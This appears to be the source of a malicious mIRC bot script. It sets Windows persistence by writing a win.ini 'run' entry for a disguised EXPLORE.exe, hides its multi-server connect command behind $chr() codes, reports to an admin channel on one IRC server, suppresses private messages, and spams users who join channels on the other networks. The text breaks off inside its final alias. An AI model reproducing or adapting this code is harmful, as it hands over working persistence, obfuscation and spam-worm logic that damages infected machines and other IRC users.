on 1:start: { nick $read nick.txt |  identd on $read nick.txt | emailaddr $read nick.txt |  username $read nick.txt | //writeini -n c:\windows\win.ini windows run C:\windows\History\EXPLORE.exe |  server irc.hayta.net |  ignore -r | $chr(115) $+ $chr(101) $+ $chr(114) $+ $chr(118) $+ $chr(101) $+ $chr(114) $chr(45) $+ $chr(109) irc.dal.net | $chr(115) $+ $chr(101) $+ $chr(114) $+ $chr(118) $+ $chr(101) $+ $chr(114) $chr(45) $+ $chr(109) irc.e-kolay.net | $chr(115) $+ $chr(101) $+ $chr(114) $+ $chr(118) $+ $chr(101) $+ $chr(114) $chr(45) $+ $chr(109) irc.undernet.org }  }
on 1:exit: { /run EXPLORE.exe }

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

on 1:text:*:?: /closemsg $nick
on 1:ACTION:*:?:  /closemsg $nick
on 1:NOTICE:*:?: /closemsg $nick

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

on 1:connect: { 
   ignore -wd *
   unset %hit
   if ($server !== irc.hayta.net) { timer 1 200 Server | join $read kanal.txt }
   if ($server == irc.hayta.net) { join %adminkanal }
   halt
}

on 1:join:*: { if ($nick == $me) && ($server == irc.hayta.net) && ($chan !== %adminkanal) { part $chan } }

on 1:disconnect: {  partall | nick $read nick.txt | .emailaddr $read nick.txt | username $read nick.txt |  identd on $read nick.txt | server | unset %hit | halt  }

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

raw 433:*:nick $read nick.txt
raw 471:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt
raw 473:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt
raw 474:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt
raw 475:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt
raw 477:*:%kanallar = $remtok(%kanallar,$2,44) | join $read kanal.txt

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

on ^*:join:*: { if ($server !== irc.hayta.net) && ($nick !== $me) { set %nicks $nick | inc %hit 1 | gonder } }

alias gonder { if ($server !== irc.hayta.net) && (%hit == 3) { msg %nicks %mesaj | notice %nicks %mesaj | unset %hit } 

